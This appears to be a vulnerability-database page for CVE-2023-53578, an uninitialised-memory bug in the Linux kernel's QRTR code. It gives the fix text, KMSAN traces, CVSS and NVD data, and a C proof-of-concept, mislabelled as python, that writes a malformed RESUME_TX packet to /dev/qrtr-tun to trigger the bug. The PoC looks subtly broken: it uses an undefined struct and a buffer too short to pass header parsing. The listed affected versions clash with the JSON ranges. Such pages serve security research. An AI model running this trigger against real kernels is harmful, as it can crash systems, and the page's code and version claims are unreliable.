CVE-2023-53578

Description

In the Linux kernel, the following vulnerability has been resolved: net: qrtr: Fix an uninit variable access bug in qrtr_tx_resume() Syzbot reported a bug as following: ===================================================== BUG: KMSAN: uninit-value in qrtr_tx_resume+0x185/0x1f0 net/qrtr/af_qrtr.c:230 qrtr_tx_resume+0x185/0x1f0 net/qrtr/af_qrtr.c:230 qrtr_endpoint_post+0xf85/0x11b0 net/qrtr/af_qrtr.c:519 qrtr_tun_write_iter+0x270/0x400 net/qrtr/tun.c:108 call_write_iter include/linux/fs.h:2189 [inline] aio_write+0x63a/0x950 fs/aio.c:1600 io_submit_one+0x1d1c/0x3bf0 fs/aio.c:2019 __do_sys_io_submit fs/aio.c:2078 [inline] __se_sys_io_submit+0x293/0x770 fs/aio.c:2048 __x64_sys_io_submit+0x92/0xd0 fs/aio.c:2048 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd Uninit was created at: slab_post_alloc_hook mm/slab.h:766 [inline] slab_alloc_node mm/slub.c:3452 [inline] __kmem_cache_alloc_node+0x71f/0xce0 mm/slub.c:3491 __do_kmalloc_node mm/slab_common.c:967 [inline] __kmalloc_node_track_caller+0x114/0x3b0 mm/slab_common.c:988 kmalloc_reserve net/core/skbuff.c:492 [inline] __alloc_skb+0x3af/0x8f0 net/core/skbuff.c:565 __netdev_alloc_skb+0x120/0x7d0 net/core/skbuff.c:630 qrtr_endpoint_post+0xbd/0x11b0 net/qrtr/af_qrtr.c:446 qrtr_tun_write_iter+0x270/0x400 net/qrtr/tun.c:108 call_write_iter include/linux/fs.h:2189 [inline] aio_write+0x63a/0x950 fs/aio.c:1600 io_submit_one+0x1d1c/0x3bf0 fs/aio.c:2019 __do_sys_io_submit fs/aio.c:2078 [inline] __se_sys_io_submit+0x293/0x770 fs/aio.c:2048 __x64_sys_io_submit+0x92/0xd0 fs/aio.c:2048 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd It is because that skb->len requires at least sizeof(struct qrtr_ctrl_pkt) in qrtr_tx_resume(). And skb->len equals to size in qrtr_endpoint_post(). But size is less than sizeof(struct qrtr_ctrl_pkt) when qrtr_cb->type equals to QRTR_TYPE_RESUME_TX in qrtr_endpoint_post() under the syzbot scenario. This triggers the uninit variable access bug. Add size check when qrtr_cb->type equals to QRTR_TYPE_RESUME_TX in qrtr_endpoint_post() to fix the bug.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:6.3:rc1:*:*:*:*:*:* - VULNERABLE

Linux Kernel < 6.6 (受commit bef57c227b52修复的版本)

Linux Kernel < 6.1 (受commit c6a796ee5a639修复的版本)

Linux Kernel < 5.15 (受commit 8c9ce34a6ff2修复的版本)

Linux Kernel < 5.10 (受commit 6417070918de修复的版本)

Linux Kernel < 5.4 (受commit 3814d211ff13修复的版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2023-53578 PoC - Linux Kernel QRTR Uninit Variable Access
// This PoC triggers the uninitialized variable access bug in qrtr_tx_resume()
// by sending a QRTR_TYPE_RESUME_TX control packet with insufficient size.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <linux/aio_abi.h>

#define QRTR_TUN_DEV "/dev/qrtr-tun"
#define QRTR_TYPE_RESUME_TX 2  // QRTR_TYPE_RESUME_TX type value
#define QRTR_CTRL_PKT_SIZE 8   // sizeof(struct qrtr_ctrl_pkt)

// Trigger the vulnerability via qrtr tunnel write
int trigger_vuln(void) {
    int fd;
    char buf[4];  // Intentionally smaller than sizeof(struct qrtr_ctrl_pkt)
    struct qrtr_ctrl_pkt pkt;

    fd = open(QRTR_TUN_DEV, O_WRONLY);
    if (fd < 0) {
        perror("open qrtr-tun");
        return -1;
    }

    // Construct a malformed QRTR_TYPE_RESUME_TX packet
    // Size is less than sizeof(struct qrtr_ctrl_pkt) to trigger the bug
    memset(buf, 0, sizeof(buf));
    buf[0] = QRTR_TYPE_RESUME_TX;  // Set type to trigger vulnerable path

    // Write the malformed packet - this triggers qrtr_endpoint_post()
    // with insufficient size, leading to uninit memory access in qrtr_tx_resume()
    write(fd, buf, sizeof(buf));

    close(fd);
    return 0;
}

// Alternative: Use io_submit (as shown in the call trace) for async trigger
int trigger_vuln_async(void) {
    int fd, ret;
    struct iocb cb;
    struct iocb *cbs[1];
    char buf[4];  // Smaller than qrtr_ctrl_pkt
    long ioctx_id;
    aio_context_t ioctx = 0;

    // Setup AIO context
    ret = syscall(SYS_io_setup, 1, &ioctx);
    if (ret < 0) {
        perror("io_setup");
        return -1;
    }

    fd = open(QRTR_TUN_DEV, O_WRONLY);
    if (fd < 0) {
        perror("open qrtr-tun");
        return -1;
    }

    memset(buf, 0, sizeof(buf));
    buf[0] = QRTR_TYPE_RESUME_TX;

    // Prepare async I/O control block
    memset(&cb, 0, sizeof(cb));
    cb.aio_fildes = fd;
    cb.aio_buf = (unsigned long)buf;
    cb.aio_nbytes = sizeof(buf);  // Intentionally too small
    cb.aio_offset = 0;
    cb.aio_lio_opcode = IOCB_CMD_PWRITE;
    cbs[0] = &cb;

    // Submit async write - triggers the vulnerable code path
    // Call trace: io_submit -> aio_write -> qrtr_tun_write_iter -> 
    //             qrtr_endpoint_post -> qrtr_tx_resume (BUG)
    ret = syscall(SYS_io_submit, ioctx, 1, cbs);
    if (ret < 0) {
        perror("io_submit");
    }

    close(fd);
    syscall(SYS_io_destroy, ioctx);
    return 0;
}

int main(int argc, char *argv[]) {
    printf("CVE-2023-53578 PoC - Linux Kernel QRTR Uninit Variable Access\n");
    printf("Triggering vulnerability...\n");

    if (argc > 1 && strcmp(argv[1], "async") == 0) {
        trigger_vuln_async();
    } else {
        trigger_vuln();
    }

    printf("Done. Check kernel logs for KMSAN report or crash.\n");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53578
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53578
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53578/
[4] VulDB https://vuldb.com/cve/CVE-2023-53578
[5] https://git.kernel.org/stable/c/3814d211ff13ee35f2d9437439a6c7df58524137
[6] https://git.kernel.org/stable/c/6417070918de3bcdbe0646e7256dae58fd8083ba
[7] https://git.kernel.org/stable/c/8c9ce34a6ff2c544f96ce0b088e8fd3c1b9698c4
[8] https://git.kernel.org/stable/c/bef57c227b52c2bde00fad33556175d36d12cfa0
[9] https://git.kernel.org/stable/c/c6a796ee5a639ffb83c6e5469408cc2ec16cac6a

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53578", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:53.483", "lastModified": "2026-03-23T18:30:42.813", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: qrtr: Fix an uninit variable access bug in qrtr_tx_resume()\n\nSyzbot reported a bug as following:\n\n=====================================================\nBUG: KMSAN: uninit-value in qrtr_tx_resume+0x185/0x1f0 net/qrtr/af_qrtr.c:230\n qrtr_tx_resume+0x185/0x1f0 net/qrtr/af_qrtr.c:230\n qrtr_endpoint_post+0xf85/0x11b0 net/qrtr/af_qrtr.c:519\n qrtr_tun_write_iter+0x270/0x400 net/qrtr/tun.c:108\n call_write_iter include/linux/fs.h:2189 [inline]\n aio_write+0x63a/0x950 fs/aio.c:1600\n io_submit_one+0x1d1c/0x3bf0 fs/aio.c:2019\n __do_sys_io_submit fs/aio.c:2078 [inline]\n __se_sys_io_submit+0x293/0x770 fs/aio.c:2048\n __x64_sys_io_submit+0x92/0xd0 fs/aio.c:2048\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nUninit was created at:\n slab_post_alloc_hook mm/slab.h:766 [inline]\n slab_alloc_node mm/slub.c:3452 [inline]\n __kmem_cache_alloc_node+0x71f/0xce0 mm/slub.c:3491\n __do_kmalloc_node mm/slab_common.c:967 [inline]\n __kmalloc_node_track_caller+0x114/0x3b0 mm/slab_common.c:988\n kmalloc_reserve net/core/skbuff.c:492 [inline]\n __alloc_skb+0x3af/0x8f0 net/core/skbuff.c:565\n __netdev_alloc_skb+0x120/0x7d0 net/core/skbuff.c:630\n qrtr_endpoint_post+0xbd/0x11b0 net/qrtr/af_qrtr.c:446\n qrtr_tun_write_iter+0x270/0x400 net/qrtr/tun.c:108\n call_write_iter include/linux/fs.h:2189 [inline]\n aio_write+0x63a/0x950 fs/aio.c:1600\n io_submit_one+0x1d1c/0x3bf0 fs/aio.c:2019\n __do_sys_io_submit fs/aio.c:2078 [inline]\n __se_sys_io_submit+0x293/0x770 fs/aio.c:2048\n __x64_sys_io_submit+0x92/0xd0 fs/aio.c:2048\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nIt is because that skb->len requires at least sizeof(struct qrtr_ctrl_pkt)\nin qrtr_tx_resume(). And skb->len equals to size in qrtr_endpoint_post().\nBut size is less than sizeof(struct qrtr_ctrl_pkt) when qrtr_cb->type\nequals to QRTR_TYPE_RESUME_TX in qrtr_endpoint_post() under the syzbot\nscenario. This triggers the uninit variable access bug.\n\nAdd size check when qrtr_cb->type equals to QRTR_TYPE_RESUME_TX in\nqrtr_endpoint_post() to fix the bug."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-908"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.6", "versionEndExcluding": "5.10.178", "matchCriteriaId": "D24F41C8-D72D-442C-8122-DD0C7229CC1F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.108", "matchCriteriaId": "12E7A5F9-38FA-429F-A165-975A914E6666"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.25", "matchCriteriaId": "A6E5D96B-E06F-4EB1-B0AA-BB8F5E9187E0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.12", "matchCriteriaId": "4AA01E0B-227C-4686-AC91-BA30BCC48E6D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc1:*:*:*:*:*:*", "matchCriteriaId": "B8E3B0E8-FA27-4305-87BB-AF6C25B160CB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc2:*:*:*:*:*:*", "matchCriteriaId": "A47F0FC3-CE52-4BA1-BA51-22F783938431"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc3:*:*:*:*:*:*", "matchCriteriaId": "3583026A-27EC-4A4C-850A-83F2AF970673"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc4:*:*:*:*:*:*", "matchCriteriaId": "DC271202-7570-4505-89A4-D602D47BFD00"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc5:*:*:*:*:*:*", "matchCriteriaId": "D413BB6D-4F74-4C7D-9163-47786619EF53"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc6:*:*:*:*:*:*", "matchCriteriaId": "F4D613FB-9976-4989-8C4A-567773373CEA"}]}]}], "references": [{"url": "https://git.ker ... (truncated)